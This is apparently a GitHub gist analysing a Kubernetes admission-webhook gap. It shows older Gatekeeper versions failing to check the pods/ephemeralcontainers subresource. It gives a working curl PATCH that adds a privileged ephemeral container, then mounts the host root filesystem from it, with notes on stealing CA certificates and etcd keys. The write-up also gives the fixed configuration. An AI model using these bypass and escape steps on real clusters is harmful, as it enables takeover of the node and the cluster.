Skip to content

Instantly share code, notes, and snippets.

@skraga
Created August 21, 2023 22:55
Show Gist options
  • Save skraga/eae7edeaaba49d13ea0dbeda299db834 to your computer and use it in GitHub Desktop.
Save skraga/eae7edeaaba49d13ea0dbeda299db834 to your computer and use it in GitHub Desktop.

How to mess with admission webhooks and have a giant security hole

Intro

Starting from Kubernetes 1.21 Pod Security Policies were deprecated and removed from 1.25+. See https://kubernetes.io/blog/2021/04/06/podsecuritypolicy-deprecation-past-present-and-future/ Suggested replacement Pod Security Standards doesn't provide as much granularity as we had with Pod Security Policies. For example, when you need to grant some extra capability that is not granted in the baseline profile you need to change the entire profile to privileged that grants almost all and is a major security risk.

The suggested alternative is to deploy an external admission controller (OPA/Gatekeeper, Kyverno, Kubewarden, etc) and do more granular validation. But, there are some possible caveats and security risks as well. The purpose of this article is to show these risks and bring some attention to them as well as suggest what we can do to avoid them.

Prerequisites

# Deploy kind cluster
kind create cluster --image kindest/node:v1.28.0

# Install OPA/Gatekeeper (specific version, and disable PSP as 1.25+ comes without PSP)
helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
helm install gatekeeper/gatekeeper --version "3.8.1" --name-template=gatekeeper --namespace gatekeeper-system --create-namespace --set psp.enabled=false

# Create namespace where restriction would be applied
kubectl create ns restricted

# Apply constraint template from OPA/Gatekeeper PSP library (controls privilege escalation)
curl -s https://raw.githubusercontent.com/open-policy-agent/gatekeeper-library/master/library/pod-security-policy/allow-privilege-escalation/template.yaml |\
tee /dev/tty |\
kubectl apply -f -

# Apply constraint only to our newly created namespace (restricted)
kubectl apply -f - <<EOF
# source: https://raw.githubusercontent.com/open-policy-agent/gatekeeper-library/master/library/pod-security-policy/allow-privilege-escalation/samples/psp-allow-privilege-escalation-container/constraint.yaml

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPAllowPrivilegeEscalationContainer
metadata:
  name: psp-allow-privilege-escalation-container
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
    namespaceSelector:                           # <- ADDED
      matchLabels:                               # <- ADDED
        kubernetes.io/metadata.name: restricted  # <- ADDED
EOF

# perform some validation tests and make sure constraint is working
kubectl apply --dry-run=server -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: pod-ok
  namespace: restricted
spec:
  containers:
  - name: container
    image: nginx
    securityContext:
      privileged: false
      allowPrivilegeEscalation: false # set it because default value is true
---
apiVersion: v1
kind: Pod
metadata:
  name: pod-priv
  namespace: restricted
spec:
  containers:
  - name: container
    image: nginx
    securityContext:
      # we can't use privileged true w/o privilege escalation, will cause an error
      privileged: true
      allowPrivilegeEscalation: false
---
apiVersion: v1
kind: Pod
metadata:
  name: pod-fail
  namespace: restricted
spec:
  containers:
  - name: privileged-container
    image: nginx
    securityContext:
      privileged: true
  initContainers:
  - name: privileged-init-container
    image: nginx
    securityContext:
      privileged: true
EOF

So far so good, as you can see from our tests seems we're on the safe side and our rules are enforced.

pod/pod-ok created (server dry run)

Error from server (Invalid): error when creating "STDIN": Pod "pod-priv" is invalid: spec.containers[0].securityContext: Invalid value: core.SecurityContext{Capabilities:(*core.Capabilities)(nil), Privileged:(*bool)(0xc0072bf5ca), SELinuxOptions:(*core.SELinuxOptions)(nil), WindowsOptions:(*core.WindowsSecurityContextOptions)(nil), RunAsUser:(*int64)(nil), RunAsGroup:(*int64)(nil), RunAsNonRoot:(*bool)(nil), ReadOnlyRootFilesystem:(*bool)(nil), AllowPrivilegeEscalation:(*bool)(0xc0072bf5c9), ProcMount:(*core.ProcMountType)(nil), SeccompProfile:(*core.SeccompProfile)(nil)}: cannot set `allowPrivilegeEscalation` to false and `privileged` to true

Error from server (Forbidden): error when creating "STDIN": admission webhook "validation.gatekeeper.sh" denied the request: [psp-allow-privilege-escalation-container] Privilege escalation container is not allowed: privileged-container
[psp-allow-privilege-escalation-container] Privilege escalation container is not allowed: privileged-init-container

Investigating validation for ephemeralContainers

Let's see if it is possible to deploy privileged container somehow and bypass the admission webhook. For that, we'll deploy the base pod and try to play with it.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: base
  namespace: restricted
spec:
  containers:
  - name: nginx
    image: nginx
    securityContext:
      # set field explicitly to false and for simplicity we don't 
      # need any mutations to make it false during creation
      allowPrivilegeEscalation: false 
EOF

We already checked that regular and init containers are guarded by OPA/Gatekeeper. Let's try the same with ephemeral containers.

First, we can try some dumb thing and simply edit the pod and add some basic ephemeral container kubectl edit pod base we'll get the next error saying that Pod object is mostly immutable:

# pods "base" was not valid:
# * spec: Forbidden: pod updates may not change fields other than `spec.containers[*].image`,`spec.initContainers[*].image`,`spec.activeDeadlineSeconds`,`spec.tolerations` (only additions to existing tolerations),`spec.terminationGracePeriodSeconds` (allow it to be set to 1 if it was previously negative)

Second, we can try to use kubectl patch command and apply a patch like this:

kubectl patch pod base -n restricted -v=7 -p '{"spec": {"ephemeralContainers": [{"image": "busybox","name": "escape","securityContext": {"privileged": true}}]}}'

and again receive an error:

I0821 23:54:28.675988   20380 round_trippers.go:463] GET https://127.0.0.1:42959/api/v1/namespaces/restricted/pods/base
I0821 23:54:28.676097   20380 round_trippers.go:469] Request Headers:
I0821 23:54:28.676114   20380 round_trippers.go:473]     Accept: application/json
I0821 23:54:28.676251   20380 round_trippers.go:473]     User-Agent: kubectl/v1.27.2 (linux/amd64) kubernetes/7f6f68f
I0821 23:54:28.692883   20380 round_trippers.go:574] Response Status: 200 OK in 16 milliseconds
I0821 23:54:28.693657   20380 round_trippers.go:463] PATCH https://127.0.0.1:42959/api/v1/namespaces/restricted/pods/base?fieldManager=kubectl-patch
I0821 23:54:28.693705   20380 round_trippers.go:469] Request Headers:
I0821 23:54:28.693752   20380 round_trippers.go:473]     User-Agent: kubectl/v1.27.2 (linux/amd64) kubernetes/7f6f68f
I0821 23:54:28.693794   20380 round_trippers.go:473]     Content-Type: application/strategic-merge-patch+json
I0821 23:54:28.693835   20380 round_trippers.go:473]     Accept: application/json
I0821 23:54:28.708534   20380 round_trippers.go:574] Response Status: 422 Unprocessable Entity in 14 milliseconds
The Pod "base" is invalid: spec: Forbidden: pod updates may not change fields other than `spec.containers[*].image`,`spec.initContainers[*].image`,`spec.activeDeadlineSeconds`,`spec.tolerations` (only additions to existing tolerations),`spec.terminationGracePeriodSeconds` (allow it to be set to 1 if it was previously negative)

Third, we know that we can use kubectl debug command and it should work for this purpose. If you run this command with --help flag you'll see that you can add an ephemeral container but only with some security profiles:

Debugging profile. Options are "legacy", "general", "baseline", "netadmin", or "restricted"

If you'll check them with extra kubectl verbosity you'll see settings for each profile and find almost nothing interesting there. Let's take a closer look at what kind of API calls kubectl debug does.

kubectl debug base --image=busybox -n restricted -v=7 --profile=baseline
...
I0821 23:56:55.472632   20940 debug.go:460] generated strategic merge patch for debug container: {"spec":{"ephemeralContainers":[{"image":"busybox","name":"debugger-vtsjn","resources":{},"terminationMessagePolicy":"File"}]}}
I0821 23:56:55.472771   20940 round_trippers.go:463] PATCH https://127.0.0.1:42959/api/v1/namespaces/restricted/pods/base/ephemeralcontainers
I0821 23:56:55.472845   20940 round_trippers.go:469] Request Headers:
I0821 23:56:55.472915   20940 round_trippers.go:473]     Accept: application/json, */*
I0821 23:56:55.472972   20940 round_trippers.go:473]     Content-Type: application/strategic-merge-patch+json
I0821 23:56:55.473017   20940 round_trippers.go:473]     User-Agent: kubectl/v1.27.2 (linux/amd64) kubernetes/7f6f68f
I0821 23:56:55.485007   20940 round_trippers.go:574] Response Status: 200 OK in 11 milliseconds

As you can see from the output above kubectl debug does the same PATCH operation and it works but kubectl patch doesn't. The answer here: debug uses a slightly different endpoint (/ephemeralcontainers at the end of the HTTP path).

Different endpoints are used here because calls are made to pods/ephemeralcontainers subresource instead of pods That's the key to why we can add ephemeral containers to our pod in this case.

Taking all this information into account we can craft our API request with curl and do whatever we want (e.g. add privileged ephemeral container)

# use kubectl proxy command for convenient access to Kubernetes API (it will be available on 127.0.0.1:8001)
kubectl proxy&  # OR run just 'kubectl proxy' (requires separate terminal and proper kubeconfig) 

# create patch with privileged ephemeral container
payload=$(cat << END
{
    "spec": {
        "ephemeralContainers": [
            {
                "image": "ubuntu",
                "name": "escape",
                "command": [
                  "sleep",
                  "infinity"
                ],
                "securityContext": {
                  "privileged": true
                }
            }
        ]
    }
}
END
)

# apply request to API
curl -v -XPATCH  \
-H "Accept: application/json, */*" \
-H "Content-Type: application/strategic-merge-patch+json" \
-H "User-Agent: kubectl/v1.27.2 (darwin/amd64) kubernetes/7f6f68f" \
--data-binary "$payload" \
'http://127.0.0.1:8001/api/v1/namespaces/restricted/pods/base/ephemeralcontainers'

Validate

kubectl get po -o yaml -n restricted base | yq .spec.ephemeralContainers

- image: busybox
  imagePullPolicy: Always
  name: escape
  resources: {}
  securityContext:
    privileged: true
  terminationMessagePath: /dev/termination-log
  terminationMessagePolicy: File

But STOP, we have our OPA/Gatekeeper deployed and such request is EXPECTED to be blocked (same as for containers and init containers). And NO, it is not.

Let's take a look at validating webhook configuration (defines what to send to webhook):

# kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io gatekeeper-validating-webhook-configuration -o yaml

kind: ValidatingWebhookConfiguration
metadata:
  annotations:
    meta.helm.sh/release-name: gatekeeper
    meta.helm.sh/release-namespace: gatekeeper-system
  creationTimestamp: "2023-08-21T20:43:11Z"
  generation: 2
  labels:
    app: gatekeeper
    app.kubernetes.io/managed-by: Helm
    chart: gatekeeper
    gatekeeper.sh/system: "yes"
    heritage: Helm
    release: gatekeeper
  name: gatekeeper-validating-webhook-configuration
  resourceVersion: "709"
  uid: 586b128d-d6e3-448e-a34d-bca2fc311fbc
webhooks:
- admissionReviewVersions:
  - v1
  - v1beta1
  clientConfig:
    caBundle: <REDACTED>
    service:
      name: gatekeeper-webhook-service
      namespace: gatekeeper-system
      path: /v1/admit
      port: 443
  failurePolicy: Ignore
  matchPolicy: Exact
  name: validation.gatekeeper.sh
  namespaceSelector:
    matchExpressions:
    - key: admission.gatekeeper.sh/ignore
      operator: DoesNotExist
  objectSelector: {}
  rules:
  - apiGroups:
    - '*'
    apiVersions:
    - '*'
    operations:
    - CREATE
    - UPDATE
    resources:
    - '*'
    scope: '*'
  sideEffects: None
  timeoutSeconds: 3
...

You might think "Ah OK, we need to add PATCH operation into the configuration to resolve this" but we can't do it because it is not supported and we'll have the next message

# validatingwebhookconfigurations.admissionregistration.k8s.io "gatekeeper-validating-webhook-configuration" was not valid:
# * webhooks[0].rules[0].operations[2]: Unsupported value: "PATCH": supported values: "*", "CONNECT", "CREATE", "DELETE", "UPDATE"

Asterisk (*) in this case means all listed operations in this error. PATCH is not supported by Kubernetes ValidatingWebhookConfiguration. But the problem here is not because of patching, the real problem here is Kubernetes subresources. Some objects have subresources and these subresources require additional care. In the case of RBAC, it is easier because we have a 'default deny' there and in the case of webhooks we need to explicitly define what we need to send into webhook to perform additional validation (quite opposite to RBAC, right?).

If interested, you can obtain all subresources from your cluster and available verbs for each of them with the next simple script:

#!/bin/bash
# run `kubectl proxy` command first

SERVER="localhost:8001"
APIS=$(curl -s $SERVER/apis | jq -r '[.groups | .[].name] | join(" ")')

# do core resources first, which are at a separate api location
api="core"
curl -s $SERVER/api/v1 | jq -r --arg api "$api" '.resources | .[] | "\($api) \(.name): \(.verbs | join(" "))"'

# now do non-core resources
for api in $APIS; do
    version=$(curl -s $SERVER/apis/$api | jq -r '.preferredVersion.version')
    curl -s $SERVER/apis/$api/$version | jq -r --arg api "$api" '.resources | .[]? | "\($api) \(.name): \(.verbs | join(" "))"'
done

On our test cluster for pods it would be:

core pods: create delete deletecollection get list patch update watch
core pods/attach: create get
core pods/binding: create
core pods/ephemeralcontainers: get patch update
core pods/eviction: create
core pods/exec: create get
core pods/log: get
core pods/portforward: create get
core pods/proxy: create delete get patch update
core pods/status: get patch update

Attack vectors

First of all, without custom additional controls, you can bypass the scheduler(node selector, affinity, tolerations) and schedule your pod wherever you want. It could be control plane nodes. It's not the case for AWS EKS where the control plane is separate.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: base
  namespace: restricted
spec:
  nodeName: <node_name>   # <- add here
  containers:
  - name: nginx
    image: nginx
    securityContext:
      # set field explicitly to false and for simplicity we don't 
      # need any mutations to make it false during creation
      allowPrivilegeEscalation: false 
EOF

When you set nodeName you're doing the scheduler's job. It goes thru configuration in manifest, then does filtering and scoring and at the end saves nodeName into pod object.

Having a container in privileged mode is a very huge security risk and should be never possible (except for system things that are under your control). Let me show one of the possible attack vectors - mounting host root (/) filesystem with read-write. Done on Rocky Linux 8 (RHEL-based distro).

kubectl exec -it -n restricted base -c escape -- bash

root@base:/# # check root UUID
root@base:/# cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.18.0-477.15.1.el8_8.aarch64 root=UUID=83bb5b52-0ae0-43a3-897b-befd7ef3aad0 ro console=tty1 console=ttyS0,115200n8 earlyprintk=ttyS0,115200 rootdelay=300 net.ifnames=0 scsi_mod.use_blk_mq=y crashkernel=512M-1G:160M,1G-2G:448M,2G-:512M
root@base:/#
root@base:/# findfs UUID=83bb5b52-0ae0-43a3-897b-befd7ef3aad0
/dev/nvme0n1p2
root@base:/#
root@base:/# mkdir /mnt/root
root@base:/# mount /dev/nvme0n1p2 /mnt/root

When you have the host root filesystem mounted with write permissions you can:

  • add a new user and SSH key, edit sudo rights
  • use the container runtime socket and run whatever container you want (e.g with hostPID and then use more convenient tooling like nsenter to do namespace manipulations and obtain host shell)
  • control plane: manipulate with static pods, API server flags, decrease security level, obtain host shell, etc
  • control plane: steal Kubernetes CA certificates and generate 'golden' user keypair which would be valid for the same duration as CA
  • control plane: steal etcd database and encryption keys (if encryption at rest is enabled)
  • intercept traffic, do whatever you want, etc

Conclusion

All consequences above are possible ONLY if you don't have enough attention to detail. I haven't checked other tools (Kyverno, etc) but talking about Gatekeeper, it was fixed in version 3.9.0+ and the updated Gatekeeper configuration looks like this:

  - apiGroups:
    - '*'
    apiVersions:
    - '*'
    operations:
    - CREATE
    - UPDATE
    {{- if .Values.enableDeleteOperations }}
    - DELETE
    {{- end }}
    resources:
    - '*'
    # Explicitly list all known subresources except "status" (to avoid destabilizing the cluster and increasing load on gatekeeper).
    # You can find a rough list of subresources by doing a case-sensitive search in the Kubernetes codebase for 'Subresource("'
    - 'pods/ephemeralcontainers'
    - 'pods/exec'
    - 'pods/log'
    - 'pods/eviction'
    - 'pods/portforward'
    - 'pods/proxy'
    - 'pods/attach'
    - 'pods/binding'
    - 'deployments/scale'
    - 'replicasets/scale'
    - 'statefulsets/scale'
    - 'replicationcontrollers/scale'
    - 'services/proxy'
    - 'nodes/proxy'
    # For constraints that mitigate CVE-2020-8554
    - 'services/status'

With newer Gatekeeper you won't be able to run privileged ephemeral container because this specific endpoint is covered.

When you decide to use some 3rd party tooling to perform validation (seems you're forced to do so after PSP deprecation) or use your custom ones you need to carefully check their configuration (e.g. subresources) otherwise there is a risk to compromise the entire cluster.

PS: Starting from Kubernetes 1.28 Validating Admission Policy has been graduated to beta. Kubernetes blog post on this: https://kubernetes.io/blog/2023/03/30/kubescape-validating-admission-policy-library/. It is an additional security mechanism that could be used. It can deal with simple rules but compared to 3rd party webhooks it is much faster. To try it you need to:

  • Have Kubernetes 1.28 or later
  • Ensure the ValidatingAdmissionPolicy feature gate is enabled.
  • Ensure that the admissionregistration.k8s.io/v1beta1 API is enabled
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment